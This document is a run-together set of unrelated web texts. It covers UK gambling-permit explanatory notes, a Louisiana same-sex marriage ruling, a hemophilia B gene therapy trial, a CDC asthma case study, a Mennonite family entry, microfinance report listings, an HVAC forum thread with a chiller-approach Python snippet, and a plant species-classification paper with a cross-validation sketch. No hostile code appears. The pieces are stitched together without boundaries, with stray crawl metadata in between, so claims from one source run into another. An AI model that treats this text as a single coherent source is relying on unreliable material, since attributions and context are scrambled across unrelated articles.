Section 247: Family entertainment centre permits 606.Family entertainment centre (“FEC”) gaming machine permits allow certain gaming machines to be made available for use without an operating or premises licence. These permits are issued by licensing authorities using the procedure set out in Schedule 10. They relate to the lowest category of machine. If an FEC wished to use Category C and D machines, it would require an appropriate operating and premises licence, under Parts 5 and 8 of the Act. The permits provided for here only relate to Category D machines. 607.Only premises which are wholly or mainly used for making gaming machines available for use may hold an FEC gaming machine permit. This is a change from the position prior to the Act, when any premises could apply for a permit allowing them to use an “amusements with prizes” gaming machine (the nearest equivalent to a Category D machine). The intention is that gaming machines in certain non-gambling premises, like those now sometimes located in fish and chip shops and taxi cab ranks, should be removed. Once these provisions are commenced, permits previously granted under Schedule 9 to the Gaming Act 1968 will no longer be available under the Act, except to the extent that they relate to premises wholly or mainly used for making gaming machines available for use. Transitional provisions, under Part 18, will give effect to this change, and allow existing permits to continue after the repeal of the relevant provisions of the 1968 Act, until the date on which they would otherwise have expired if those provisions had continued in force. The position of premises holding an alcohol licence is dealt with separately in Part 12.
<urn:uuid:da9adff0-694c-48ee-b1d6-b99ffbf72bfc>
CC-MAIN-2016-44
http://www.legislation.gov.uk/ukpga/2005/19/notes/division/5/3/10/30
s3://commoncrawl/crawl-data/CC-MAIN-2016-44/segments/1476988719215.16/warc/CC-MAIN-20161020183839-00200-ip-10-171-6-4.ec2.internal.warc.gz
en
0.939914
4,145
1.804688
2
LAFAYETTE — A state judge who ruled Monday that Louisiana’s ban on same-sex marriage is unconstitutional likened the law to segregation-era prohibitions on interracial couples.

“Just a few decades ago in these United States, miscegenation was illegal. It is now something that most Americans in today’s society hardly even debate,” District Judge Edward Rubin, who is black, wrote in a ruling unsealed Tuesday.

Rubin’s decision came Monday in an adoption case involving two women in Lafayette but had been sealed from public view pending a redaction to remove the name of their minor son. The ruling by the 15th Judicial District Court judge in Lafayette will have no immediate impact on the status of same-sex marriages in Louisiana, and the state Attorney General’s Office is appealing the decision to the Louisiana Supreme Court.

Supporters of same-sex marriage have hailed the decision as a moral and legal victory in the ongoing battle over an issue that could soon be settled by the U.S. Supreme Court. Rubin’s decision offers an opposing judicial view in Louisiana to a ruling earlier this month by U.S. District Judge Martin Feldman, in a case out of New Orleans, upholding the state ban. The federal judge’s ruling went against the trend of federal judges in other states striking down similar bans.

Most of Rubin’s 23-page ruling in the Lafayette case is a standard review of the procedural history of the adoption proceedings and past legal rulings in state and federal courts on the issue of same-sex marriage. But in the final pages of his decision, the judge compared laws against same-sex marriage to old bans on interracial marriage that the U.S. Supreme Court has long since struck down. Rubin predicted views on same-sex marriage will shift much like views have changed on interracial marriage.

“Lest we forget, there was a time in America’s history when gays and lesbians were not permitted to even associate in public,” Rubin wrote. “We are past that now, but when it comes to marriage between persons of the same sex, this nation is moving towards acceptance that years ago would have never been contemplated.”

Gene Mills, president of the conservative Louisiana Family Forum, characterized Rubin’s comparison to interracial marriage bans as “personal opinion” not supported by past legal cases dealing with same-sex marriage. “I think this decision is a minor legal aberration from an activist judge that will be corrected by the state Supreme Court,” Mills said.

The Forum for Equality Louisiana, which led the recent challenge to Louisiana’s same-sex marriage ban in federal court in New Orleans, praised Rubin’s ruling and in particular his references to Loving v. Virginia, the 1967 U.S. Supreme Court case that struck down laws banning interracial marriages. The case is often cited in arguments against bans on same-sex marriage.

“This court does not believe that the historical background of Loving is so different from the historical background underlying states’ bans on same-sex marriage,” Rubin wrote. “One cannot look at Loving without recognizing that it was about racism as well as a couple’s decision to assert their right to choose whom to marry.”

Rubin’s ruling came in an adoption case involving Angela Costanza and Chasity Brewer, who were legally married in California in 2008 and now live in Lafayette. Costanza sought to be legally recognized as a parent to Brewer’s son, which raised the issue of the validity under Louisiana law of their out-of-state marriage.

Rubin found Louisiana’s ban on same-sex marriage violated the due process and equal protection clauses of the 14th Amendment and the U.S. Constitution’s “full faith and credit clause,” which calls for each state to recognize the laws and court decisions of other states. The judge also declared unconstitutional a state Department of Revenue policy that barred same-sex couples from filing joint state tax returns.

The state will ask Rubin to suspend his ruling pending an appeal to the Louisiana Supreme Court, said attorney Kyle Duncan, who has been hired by the state Attorney General’s Office to handle challenges to Louisiana’s same-sex marriage ban. “We expect our stay motion to be granted, which will mean that the judgment cannot be executed during our appeal to the Louisiana Supreme Court,” Duncan said in an email Tuesday.
This post originally appeared on CNN Health.

A one-time novel gene therapy can reduce the risk of excessive bleeding in people with the bleeding disorder hemophilia B, who typically would need repeat therapies to reduce their risk, according to results from a Phase 1-2 trial.

Administration of the gene therapy on a single occasion was found to support the production of the missing blood clotting protein called factor IX in nine of 10 people who got various dose levels of the infusion therapy, according to findings published Thursday in the New England Journal of Medicine. The therapy, called FLT180a, works by delivering a supercharged variant of factor IX using a dead, inactive virus as the carrier or vector.

“Our results confirm that gene therapy with FLT180a can result in factor IX levels in the normal range with relatively low vector doses,” wrote the researchers from University College London, the Royal Free Hospital and biotechnology company Freeline Therapeutics. The trial was funded by Freeline Therapeutics.

Hemophilia B is a rare hereditary disorder caused by mutations in the gene that encodes for factor IX, leading to a lack of this protein and a higher risk of excessive bleeding. The standard care for severe hemophilia B is lifelong intravenous infusions of factor IX concentrate, sometimes weekly or even more frequently.

“Removing the need for haemophilia patients to regularly inject themselves with the missing protein is an important step in improving their quality of life,” Dr. Pratima Chowdary, a professor of hemophilia at University College London and lead author of the study, said in a news release.

Searching for ‘the sweet spot’

The researchers, based in the United Kingdom, monitored 10 men with moderately severe or severe hemophilia B for 26 weeks to assess the safety and efficacy of the therapy and determine an appropriate dosage. Too high of a dose could cause blood clotting; too low could fail to adequately treat the hemophilia condition.

From December 2017 through March 2020, the men got a single intravenous infusion of FLT180a at one of four dose levels. The researchers measured the efficacy of the therapy by evaluating factor IX levels over time, and they found that after FLT180a infusions, all of the men had increases in their factor IX levels, ranging from 7% to 280%, by 26 weeks. Factor IX activity was sustained over 27 months in all but one participant.

“Above 40% or so of normal factor IX level is considered normal,” said Dr. Nigel Key, chief of the section of classical hematology and director of the UNC Hemophilia and Thrombosis Center at the University of North Carolina at Chapel Hill, who was not involved in the study. People who have 5% to 30% of the normal amount of clotting factors in their blood typically are considered to have mild hemophilia.

In the FLT180a trial, four patients achieved levels that were higher than 100%, five were between 44% and 53%, and one was at 7%. The man with factor IX levels of 280% was one of two participants to get the highest dosage and had a serious adverse event of arteriovenous fistula thrombosis, a type of blood clotting.

“While proving that very high levels of FIX are achievable with this approach, it is clear that the optimal dose of the vector has yet to be determined,” according to Key. When the researchers determine a final study protocol for FLT180a, “it’ll be based off these data in terms of hitting the sweet spot,” Key said. “If we can get everyone in the range of 50% and 150% factor IX, that’s the sweet spot.”

The men also received immunosuppressive drugs, such as glucocorticoids and tacrolimus, to keep their immune systems from rejecting the therapy. No patients withdrew from the trial because of toxic side effects, and no deaths were reported during the study. Among all side effects, the researchers found that 10% were considered to be associated with the gene therapy and 24% with the immunosuppression.

The research team continues to evaluate the therapy. “Our trial results support further evaluation of FLT180a in clinical trials to confirm the dose and immunosuppressive regimen that are necessary for the maintenance of adequate hemostasis in patients with hemophilia B,” the researchers wrote.

‘There’s more work to be done’

The study is a Phase 1-2 trial that included only 10 participants. “Seeing the results in the same detail of a Phase 3 study will be important in terms of really understanding the impact,” said Dr. Christine Kempton, a professor at the Emory University School of Medicine who leads the clinical care team at the Hemophilia of Georgia Center for Bleeding & Clotting Disorders of Emory. She was not involved in the current study.

Additionally, FLT180a is not the only gene therapy being investigated for hemophilia. This type of therapy has been studied “for a while,” Kempton said. “The success of gene therapy and some of the challenges that it poses have been part of our discussions for several years now,” she said.

“For hemophilia B, there are other clinical trials that have produced positive results,” she said. “And there are other results in the hemophilia A space as well – other Phase 1-2 studies that have been reported. I think the overall message is that these are exciting advances, and there’s more work to be done.”
YES WE CAN Children’s Asthma Program

This case study was prepared for CDC by Dr. LaMar Palmer of MAS Consultants. The purpose of the case study is to share the experience of one community as they attempt to address the problem of asthma. It does not represent an endorsement of this approach by CDC.

YES WE CAN Children’s Asthma Program: Intervention Research Outcomes

Dr. Shannon Thyne, the Medical and Research Director of the Pediatric Asthma Clinic at San Francisco General Hospital, is in charge of the research efforts to determine the health outcomes resulting from the YES WE CAN asthma program. Dr. Thyne characterizes YES WE CAN as a "reality-based" response to the asthma epidemic in San Francisco. One reality, she explains, is that physicians are often poor at communicating and in implementing the NAEPP guidelines. The second reality is that asthma care for poor, inner-city children is substandard. Finally, most children who have asthma and their families are not taught how to manage the disease.

Dr. Thyne is a strong advocate for the patient education and training conducted in the clinic by the asthma team and reinforced in the homes by the community health worker (CHW). "Education and training supports the all-important self-management element needed to sustain improvements in the child’s asthma symptoms and reduce morbidity," according to Dr. Thyne.

A pre- and post-intervention methodology has been used to measure health outcomes and evaluate the efficacy of the YES WE CAN asthma program. The asthma outcomes shown in Tables 4 and 5 are from children treated in the San Francisco General Hospital asthma clinic between 1999 and 2003. Health outcome data for children treated between 2001 and 2003 are also available from the YES WE CAN asthma clinic at the Mission Neighborhood Health Center (Table 6).

- Page last reviewed: April 24, 2009
- Page last updated: April 27, 2009
De Mepsche was a noble family of governors in the Dutch province of Groningen. Whereas most of them, and particularly Johan de Mepsche, in the 16th century were ardent Catholics and devoted servants of the Spanish regime of the Duke of Alba, which was persecuting the Anabaptists and Mennonites, a cousin, also named Johan de Mepsche, of Den Ham, joined the Mennonites about 1580. Leaving his country, his property, and his social rank for his faith, he fled to Danzig, Prussia. He is said to have died of the plague at Danzig in 1588. The hypothesis that he may have been the ancestor of the Mennonite Hamm family in Prussia is probably tenable.

Doopsgezinde Bijdragen (1906): 35, 44.
Mennonitische Geschichtsblätter 8 (1951): 33.

Author(s): Nanne van der Zijpp

Cite This Article
van der Zijpp, Nanne. "Mepsche, de." Global Anabaptist Mennonite Encyclopedia Online. 1957. Web. 17 Jan 2017. http://gameo.org/index.php?title=Mepsche,_de&oldid=89854.
ERIC Number: ED318931
Record Type: RIE
Publication Date: 1990-Feb
Reference Count: 0

Mentoring Programs for At-Risk Youth: A Dropout Prevention Research Report.

This document provides an overview of the concept of mentoring, this time applied to the area of dropout prevention. It begins by describing the functions and characteristics of a mentor, considering the use of mentors with at-risk youth, and examining the roles of a mentor in dropout prevention. Suggestions are given for setting up a mentoring program. Program summaries are included for 15 successful mentoring programs based in schools, universities, private organizations and community groups, states, and businesses. Twelve steps for starting a mentoring program are listed and discussed: (1) establish program need; (2) secure school district commitment; (3) identify and select program staff; (4) refine program goals and objectives; (5) develop activities and procedures; (6) identify students in need of mentors; (7) promote program and recruit members; (8) train mentors and students; (9) manage mentor and student matching process; (10) monitor mentoring process; (11) evaluate ongoing and terminated cases; and (12) revise program and recycle steps. A reading and reference list is included and organization and program information is provided. Appendices contain sample forms that can be used as guides in developing and evaluating mentoring programs. (NB)

Publication Type: Reports - Descriptive
Education Level: N/A
Authoring Institution: National Dropout Prevention Center, Clemson, SC.
IES Cited: ED502502
The challenges inherent in supporting the self-help efforts of the chronically hungry poor require innovation to achieve greater scale, impact and sustainability. Freedom from Hunger has always been committed to innovation backed up by rigorous research. Our research staff and collaborators put our innovations, and those of other organizations, to the test, employing a wide range of methodologies to ensure that they are supported by evidence from the field.

We are pleased to provide our research reports to all who are interested in evidence-based innovation. Generally, these reports have also been published in part in technical journals and other publications, but seldom are the complete research reports accepted for publication. Therefore, we make our full research reports, as well as summaries, freely downloadable in PDF format. These reports provide the full details of the research projects—social and institutional context, objectives, design and implementation of the innovation being tested, research design, methods, analysis, results, discussion in light of relevant literature and conclusions.

The reports are listed below in chronological order, starting with the most recent reports. Most Freedom from Hunger reports have been translated into French and/or Spanish for the benefit of the in-country institutions with which we have partnered to develop and test these innovations. In the absence of full translations, summaries in French and/or Spanish are usually available. We sincerely hope you will find these research reports useful for broadening your understanding of value-added microfinance and related innovations.

Gray, Bobbi with Cassie Chandler, Megan Gash, Chris Dunford, Byron Hoy, Kelly Taylor, William Roberts, Paul Ream, Sara Maldonado, Lauren Brunner. Freedom from Hunger: Davis, CA. (Feb. 2013)

Listening to the poor without preconceptions has generated remarkable insights about their desires, challenges and capabilities, with significant implications for designing programs that more effectively meet their needs. To complement these efforts and the learning they have generated, Freedom from Hunger undertook a project to listen to the frontline fieldworkers; specifically, to listen to the credit officers of financial service providers who utilize the village-banking model as a platform to provide financial and non-financial services to groups of poor women. Freedom from Hunger worked with five microfinance institutions to conduct this research. Almost 200 interviews and focus-group discussions were conducted with credit officers, clients and supervisors to answer five key questions: 1) What motivates credit officers? 2) What is the state of the relationship between the credit officer and the client? 3) What can we learn from credit officers about the people they serve? 4) How can we better support credit officers? and 5) How faithfully are programs, policies and procedures carried out by credit officers? This report documents the findings for these five questions.

Integrated Health and Microfinance: Harnessing the Strengths of Two Sectors to Improve Health and Alleviate Poverty in the Andes. Metcalf, Marcia, Lisa Kuhn Fraioli, Andrea Del Granado from Freedom from Hunger, and Anna Awimbo (Microcredit Summit Campaign). 24pp. (January 2013). Davis, CA: Freedom from Hunger.

Over the last few decades, microfinance has been considered one of the most important strategies in alleviating poverty and addressing food-security issues. For years, microfinance providers have recognized that poverty and poor health are so intimately connected that it is virtually impossible to distinguish between the causes of one and the effects of the other.
Many microfinance leaders and field agents report that health problems are often given as the reason clients fail to repay loans or build and sustain successful income-generating activities. In recent years, we have begun to see how the microfinance sector is increasingly becoming recognized as an effective platform for providing vital health education, products and services.

Leatherman, Sheila and Kimberley Geissler, Department of Health Policy and Management, Gillings School of Global Public Health, University of North Carolina at Chapel Hill, Chapel Hill, NC, USA, Bobbi Gray and Megan Gash. Freedom from Hunger.

An innovative and scalable approach, health financing by microfinance institutions can expand existing health-financing options for the poor. We examined healthcare-seeking behavior, health costs and health-financing methods among microfinance clients in Bolivia, Benin and Burkina Faso. Health costs and lost productivity were substantial. Clients benefit from assistance, including health savings, health loans and health micro-insurance. Microfinance institutions offer advantages in developing health-financing options: global reach, expertise in loans and savings, and their mission to facilitate household financial stability. Health-financing products hold considerable potential but require careful design to optimize value and minimize risk to clients.

Gray, Bobbi, Megan Gash, Scarlett Reeves, Benjamin Crookston. In Thomas L. Wouters (Ed.). "Progress in Economics Research. Volume 20". 22pp. (2011). Hauppauge, NY: Nova Science Publishers, Inc. (Read-Only version).

Over the past few years, microfinance has been widely heralded as a successful contributor to the alleviation of poverty. Scores of studies have shown the positive impact that microfinance can have on the lives of poor people. However, overall progress has been disappointing. Achievement of poverty alleviation goals will call for new and innovative ways of working rather than more of the same. A strategic, overarching strategy to address poor people's interrelated needs through creative partnerships that build on the best of different development sectors has the potential to lead to exponential rather than incremental reduction of poverty in the developing world. Evidence now supports the integration of microfinance with non-financial services as an approach that has potential for enormous contribution to poverty alleviation. This chapter will focus on the opportunities and challenges for microfinance organizations providing these integrated services. It also will provide supporting evidence that shows promising financial and health benefits of integration for the poor and the institutions that support their self-help efforts.

Integrating microfinance and health strategies: examining the evidence to inform policy and practice. Sheila Leatherman, Marcia Metcalfe, Kimberley Geissler and Christopher Dunford. 17pp. (February 2011). Chapel Hill, NC: Gillings School of Global Public Health, University of North Carolina and Davis, CA: Freedom from Hunger.

Human Faces of Microfinance Impact—What We Can Learn from Freedom from Hunger’s “Impact Story” Methodology. Jarrell, Lynne, Bobbi Gray, Megan Gash, Chris Dunford. 42pp. (February 2011). Davis, CA: Freedom from Hunger.

Miller, Jaclyn and Megan Gash. Freedom from Hunger Research Paper No. 14. 26pp. (December 2010). Davis, CA: Freedom from Hunger.

Leatherman, Sheila, Somen Saha, Megan Gash and Marcia Metcalfe. Freedom from Hunger Research Paper No. 12. 7pp. (December 2010). Davis, CA: Freedom from Hunger.
If you are waiting to measure approach until you have full load, then you are missing a lot of information. Chiller is running at 50% RLA and the evaporator approach is at 1F... good or bad? If you can't judge it until the chiller is at full load, then you are not giving a clear picture to the customer. BTW... good. Why? Well, we know that approach temperatures go up with load. If the chiller is at 50% with a 1F approach, then it will most likely be OK when it loads up to 100%... it may get as high as 4-5F in this case.

Chiller is running at 50% RLA and the evaporator approach is at 5F... good or bad? Since we know that the approach is going to go up when it loads up, we know that this chiller is probably going to have an 8-10F approach at 100%... this is bad. However, we know this long before the chiller is at 100%, and we can take action to prevent it. Know how to read your approaches!

Don't step on my favorite part of the Constitution just to point out your favorite part. Political Correctness is forced on you because you have forgotten decency.

This will be a good post. To discuss approach: since approach is defined by the machine design, it is not the same for a 19XL, 19DH/DK, CVHE, etc. From my point of view, if you don't have the design sheet of the chiller, you are only making assumptions. With new and old technology you can manually load the machine to full load (I don't know if on all of them). As for a general rule for approach under unload: if one exists, I would like to know where to find that information. Thanks for sharing the information.

I approach that remark

The evaporator approach will depend on the number of passes through the chiller barrel; the more times the water shoots through the tubes, the lower the approach. Typical Trane PCV, CVHA were 2-3 pass evap with a 2 pass cond. If your condenser is clean, your condenser approach should only be 2-4°F; my guess would be fouled tubes with a 15°F condenser approach, or, as said before, a rusted-out division plate.

Once in a while everything falls into place and I am able to move forward, most of the time it just falls all over the place and I can't go anywhere-GEO
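Here is a back-of-the-napkin sketch of the part-load rule of thumb from the first post. The 0.08 F-per-percent rise and the 6F full-load limit are illustrative numbers fitted to the two examples above (1F at 50% landing around 5F at full load, 5F at 50% landing around 9F); they are not from any manufacturer's design sheet, which trumps any of this.

```python
def project_full_load_approach(approach_f, pct_rla, rise_per_pct=0.08):
    """Project a part-load evaporator approach reading (deg F) to 100% RLA.

    rise_per_pct is an illustrative constant fitted to the examples in the
    thread (1F at 50% -> ~5F at full load, 5F at 50% -> ~9F). Real behavior
    depends on the machine design and number of passes -- check the design
    sheet for your chiller.
    """
    return approach_f + rise_per_pct * (100.0 - pct_rla)


def approach_verdict(approach_f, pct_rla, full_load_limit_f=6.0):
    """Good/bad call on a part-load reading using the projection above."""
    projected = project_full_load_approach(approach_f, pct_rla)
    return "ok" if projected <= full_load_limit_f else "high - check for fouling"


print(project_full_load_approach(1.0, 50.0))  # 5.0
print(project_full_load_approach(5.0, 50.0))  # 9.0
```

The point is the same one made in the post: a part-load reading plus a rough projection tells you about full-load behavior long before the chiller ever gets there.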
- Research article
- Open Access

Reliable genomic strategies for species classification of plant genetic resources

BMC Bioinformatics volume 22, Article number: 173 (2021)

To address the need for easy and reliable species classification in plant genetic resources collections, we assessed the potential of five classifiers: Random Forest, Neighbour-Joining, 1-Nearest Neighbour, a conservative variety of 3-Nearest Neighbours, and Naive Bayes. We investigated the effects of the number of accessions per species and the misclassification rate on classification success, and validated the generic value of these results with three complete datasets. We found the conservative variety of 3-Nearest Neighbours to be the most reliable classifier when varying species representation and misclassification rate. Through the analysis of the three complete datasets, this finding showed generic value. Additionally, we present various options for marker selection for classification tasks such as these.

Large-scale genomic data are increasingly being produced for genetic resources collections. These data are useful to address species classification issues regarding crop wild relatives and improve genebank documentation. Implementation of a classification method that can improve the quality of bad datasets without gold-standard training data is considered an innovative and efficient way to improve genebank documentation.

The goal of gene banks is to secure genetic resources for research and breeding now and in the future. In 2009, gene banks worldwide maintained an estimated 7.4 million accessions, 1.4 million more than in 1996. Roughly 30% of this increase is accounted for by the increased interest in crop wild relatives (CWR), which include the progenitors of domesticated crops as well as species closely related to them.
The use of crop wild relatives to improve crop yield, pest and disease resistance, and tolerance for biotic and abiotic stress is well established, with important examples dating back more than 60 years. Since the introduction of marker-assisted breeding and more advanced technologies, the use of crop wild relatives has only intensified. The increased interest in a broad range of crop wild relatives also necessitates expertise in species identification, as the distribution of misidentified plant materials can have significant adverse effects on the subsequent use.

Traditionally, species identification has been the domain of taxonomists, who identify species based on morphological features. This is a time-consuming task, while limited morphological variation may still cause unreliable identifications [4, 5]. In addition to initial misclassifications, gene bank documentation may contain errors due to complicated accession histories involving exchanges among institutions and multiple rounds of regeneration. As a result, mistaken identities in genetic resources collections are not uncommon. Therefore, efficient methods to identify and correct species misclassifications would be very helpful to gene banks.

The need for easy and reliable species identification is not restricted to gene banks. It has existed for much longer, in disciplines ranging from ecology to food fraud detection, and gave rise to the conception of DNA barcoding in 2003. DNA barcoding is a taxonomic method that uses variation in the mitochondrial gene cytochrome c oxidase I (cox1) for species identification. Since the first publication, DNA barcoding has received wide support for its straightforward approach and efficacy in both the identification of biological specimens and the discovery of species [8, 9].
However, some criticisms have been levelled at the method as well, directed at its departure from classic taxonomy by using genetic distance measures instead of character-based identification, the lack of an objective set of criteria to delineate species when using these distance measures, and whether using only the cox1 gene is really sufficient. Although cox1 has been shown to be successful in identifying species of butterflies, birds, bats, fish, and mosquitoes [11,12,13,14,15], cox1 shows insufficient variation to distinguish species in various other groups, such as vascular plants, fungi, invertebrates, reptiles and amphibians [16,17,18,19]. An alternative to cox1 in these groups remains elusive, but it is evident that the species resolution of DNA barcoding benefits from including additional loci in the analyses to increase the number of divergent sites [20, 21]. Still, the literature addressing the methodological shortcomings of DNA barcoding is valuable and very informative.

The classification performance of many candidate methods has already been analyzed and compared in DNA barcoding, such as Neighbour-Joining (NJ), k-Nearest Neighbours (k-NN), Classification and Regression Trees (CART), Random Forest, kernel methods, Naive Bayes classifiers, Repeated Incremental Pruning to Produce Error Reduction (RIPPER), Support Vector Machines (SVMs), BLOG, and DNA-BAR [24,25,26,27,28]. The overlap of candidate methods between studies, however, is sparse. We selected a variety of methods from a pool of successful candidate methods, and aimed for diversity in methodology. This resulted in the selection of Random Forest, NJ, k-NN (at k = 1 and k = 3), and Naive Bayes. The first three were the most promising methods in the comparison study of Austerlitz et al., whereas Naive Bayes was one of the best performers in the study of Weitschek et al.
These methods broadly constitute three types of approaches: distance methods (k-NN), phylogenetic methods (NJ), and supervised machine learners (Random Forest, Naive Bayes). In these comparisons, NJ will be representative of the commonly used methodology to correct misclassifications in diverse datasets, as these are currently based on phylogenetic analysis.

In this paper, we depart from the single-gene approach of DNA barcoding strategies and instead employ SNPs from throughout the genome. This will benefit gene banks in three ways. Firstly, methods will be more generalizable across species as there will be more variation to utilize in species delineation. Secondly, the methods will be applicable to a broader range of genotyping datasets, including non-sequencing methods such as AFLPs. Thirdly, in their criticism of DNA barcoding, many have pointed out that any method relying on a single gene will encounter a problem in detecting and classifying hybrid introgressions [29,30,31], information which will be of interest for germplasm end-users. Although our datasets don't include enough confirmed hybrid accessions, we expect that genome-wide approaches will be more successful in identifying the major donor species of a hybrid.

For the vast majority of crop wild relatives, a verified genomic dataset with which to train classification models is lacking. For a select number of crops, the creation of such a dataset will only be a matter of time, but for most crops the economic incentive is lacking. In the short and long term, the genetic resources community would therefore benefit from a classification strategy that does not require a perfectly classified training set, but will instead work with datasets as they are available for genetic resources collections, i.e. mostly verified, but misclassifications may be present.
If the development of such a strategy is successful, the genomic data that are already available can immediately be used to improve the classification accuracy of the collection. There are a number of difficulties to this development.

Firstly, there are multiple dataset characteristics that have been shown to impact classification success in DNA barcoding, such as the number of species, their respective speciation time, and the number of accessions per species. These characteristics will likely also affect our classification models. Supervised learners in particular (e.g. Random Forest and Naive Bayes) may need more accessions per species to perform well. To test at what point, if any, machine learners are no longer recommended, curated datasets are created to study the effect of the number of accessions per species on the performance of classifiers.

Secondly, classification models should be able to learn from bad training data, i.e. training data with misclassifications. To determine which classifiers (if any) are most suited to work with imperfectly classified data, we simulated different misclassification rates. Comparison between the applied misclassification rate and the classification success of classifiers should reveal whether the classifiers succeeded in improving the quality of the dataset.

Thirdly, a rather severe imbalance in species representation is found in CWR datasets. Wild relatives that will readily exchange genes of interest with their cultivated counterparts (species belonging to the primary gene pool) are much better represented in datasets than wild relatives from the secondary and tertiary gene pool, as these datasets are usually generated for breeding purposes. To determine how well our results translate to such datasets, we tested the classifiers on three complete datasets, and used cross-validation on the supervised machine learners to assess how much of their initial success may be due to over-fitting.
The goal of this work is to lay the basis for curators of genetic resources to discover possible misclassifications in genotyped collections, regardless of species, inclusion of wild relatives, or genotyping method. This will improve the quality of collections at minimal cost, and contribute towards making bioinformatics more accessible to genetic resource specialists.

Performance on curated datasets

To determine if classifiers can improve the quality of a bad training dataset, they were trained on curated Helianthus datasets with varying rates of artificially induced misclassifications. They then classified these curated datasets. To examine the impact of species representation on this process, the number of representatives per species was also varied.

Through 5,000 repetitions of artificially induced misclassifications in different curated datasets, the best classifiers for each of these datasets were identified (Table 1). When the species representation exceeded 4, Random Forest was the best classifier. When species representation was lower, Naive Bayes performed markedly better than Random Forest. Overall, 3-NN showed the best performance (median prediction accuracy of 0.94 vs Random Forest's 0.92).

Random Forest and 3-NN have proven themselves adept at improving the quality of a bad dataset, and provide a significant improvement over NJ, the method that represents the current methodology to address misclassifications. Regardless of the quality of the curated datasets, NJ was outperformed. With more optimal datasets, specifically datasets including 10 accessions per species and a misclassification rate of 6.25%, NJ struggled to improve the quality. Random Forest and 3-NN, by comparison, reduced the misclassification rate in these datasets to a median of 2%. With less optimal datasets, in this case 4 accessions per species and a misclassification rate of 12.50%, 3-NN reduced the misclassification rate to a median of 6%, a marked improvement.
In contrast, NJ actually increased the misclassification rate of these datasets and output data with a median misclassification rate of 16%. In all cases, the classifiers showed reduced performance as the misclassification rate rose. Yet surprisingly, the misclassification rate appears to have little influence on which classifier performs best. Exceptions were observed for datasets with 4 or 8 accessions per species, but the difference in prediction accuracy was only minimal in these cases. It is possible that this effect (or lack thereof) is caused by the procedure used to induce misclassifications. Because accessions to misclassify were selected just as randomly as the species to mutate their identity to, all species were affected by these artificial misclassifications at similar rates. This random misclassification effect should be much easier for classifiers to mitigate than the more structural nature of misclassifications one would expect when two or more morphologically similar species are systematically confused.

Performance on complete datasets

To test whether the conclusions from the curated datasets would hold and show generic value, we compared the performance of the classifiers on three unmodified complete datasets. For the supervised machine learners, we acquired an unbiased estimate of prediction accuracy through leave-one-out cross-validation or bagging. The distance-based methods classified the data as before. Additionally, classification performance was quantified by prediction accuracy per species [see Additional file 1]. These tables show 3-NN as the best performing classifier. The performance of 3-NN is consistent with the results of the curated datasets. As expected based on the results of the curated datasets, the performance of Random Forest improved when species were represented by more accessions. The overall difference between RF, NJ, and 1-NN, however, appears slight.
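The leave-one-out estimate used for the supervised learners is simple to reproduce. The study implemented its classifiers in R; the sketch below is a hypothetical, minimal Python version of the procedure, with a toy divergent-site 1-NN classifier standing in for the actual learners.

```python
def leave_one_out_accuracy(samples, labels, classify):
    """Leave-one-out cross-validation: each sample is predicted by a
    model that never saw that sample, giving an unbiased accuracy estimate."""
    correct = 0
    for i in range(len(samples)):
        train_x = samples[:i] + samples[i + 1:]   # withhold sample i
        train_y = labels[:i] + labels[i + 1:]
        if classify(train_x, train_y, samples[i]) == labels[i]:
            correct += 1
    return correct / len(samples)

def one_nn(train_x, train_y, query):
    """Toy 1-NN stand-in: label of the sample with the fewest divergent sites."""
    dist = lambda a, b: sum(x != y for x, y in zip(a, b))
    best = min(range(len(train_x)), key=lambda j: dist(train_x[j], query))
    return train_y[best]
```

On a toy dataset of two well-separated species, e.g. samples `[(0,0,0), (0,0,1), (1,1,1), (1,1,0)]` with labels `["a", "a", "b", "b"]`, the leave-one-out accuracy is 1.0.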
Perhaps the most surprising result is the extremely poor performance of Naive Bayes. It performed best in the resequenced tomato dataset, in which its correct classifications consist almost exclusively of the species with the largest representation, S. lycopersicum and S. habrochaites. Conversely, it misclassified every single one of the 100 H. annuus accessions, which suggests that species representation is not solely at the root of the poor performance. As expected based on the curated datasets, Random Forest performed best on the AFLP tomato dataset, which contained the fewest species represented by 4 or fewer accessions. There was no difference between the out-of-bag prediction accuracy and the fraction of accessions that was correctly classified. This is unsurprising for forests of 10,000 trees trained on relatively small datasets. The aim of this research was to identify the most reliable methods for genome-wide species classification of imperfectly classified datasets. We used methods that previously proved successful in DNA barcoding and investigated their performance on genome-wide SNPs under varying rates of misclassification and species representation. We then assessed their performance on three complete datasets. Here we reflect on the methodology used in this research, and specify the methodologies we recommend to the genetic resources community. To determine the effect of misclassification rate on classifier performance, misclassifications were simulated by randomly changing an accession's species to a random different species from the same dataset. This resulted in reduced performance for all classifiers as the misclassification rate rose, yet surprisingly, the misclassification rate appeared to have little influence on which classifier performed best. Exceptions were observed for datasets with 4 or 8 accessions per species, but the difference in prediction accuracy was only minimal in these cases.
It is possible that this effect (or lack thereof) is caused by the method used to induce misclassifications. Accessions to misclassify were selected randomly, and as such, all species were affected by these artificial misclassifications at similar rates. This effect might be much easier for classifiers to mitigate than the more structural nature of misclassifications one would expect when two or more morphologically similar species are systematically confused.

Validity of outlier detection methods

For the curation of the Helianthus datasets, potential misclassifications in a subset of sunflower species were identified based on either their outlying position in the neighbour-joining tree [see Additional file 2], or their relatively small proximity to others of their class in a Random Forest [see Additional file 3]. We reexamined these potential misclassifications using the complete sunflower dataset. For this, we compared the a priori classifications with the predictions of both Random Forest and 3-NN, the most reliable classification methods. The performance of the Random Forest outlier detection method was unexpectedly poor, as only two of the six accessions marked as outliers (max148 and niv07) were actually re-classified by Random Forest and 3-NN. Comparison of suspected outliers with non-outliers revealed that considerably fewer reads were generated for outliers (median 1.0 million vs 2.4 million). This strongly suggests Random Forest used the number of imputed values to distinguish outliers from non-outliers. We used the most common allele at each locus to impute missing values, which in this case is likely the allele belonging to Helianthus annuus, the species represented by the vast majority of the accessions (Table 2). This way, we likely introduced Helianthus annuus alleles into accessions that were not Helianthus annuus, which led to their relative dissimilarity to others of their species.
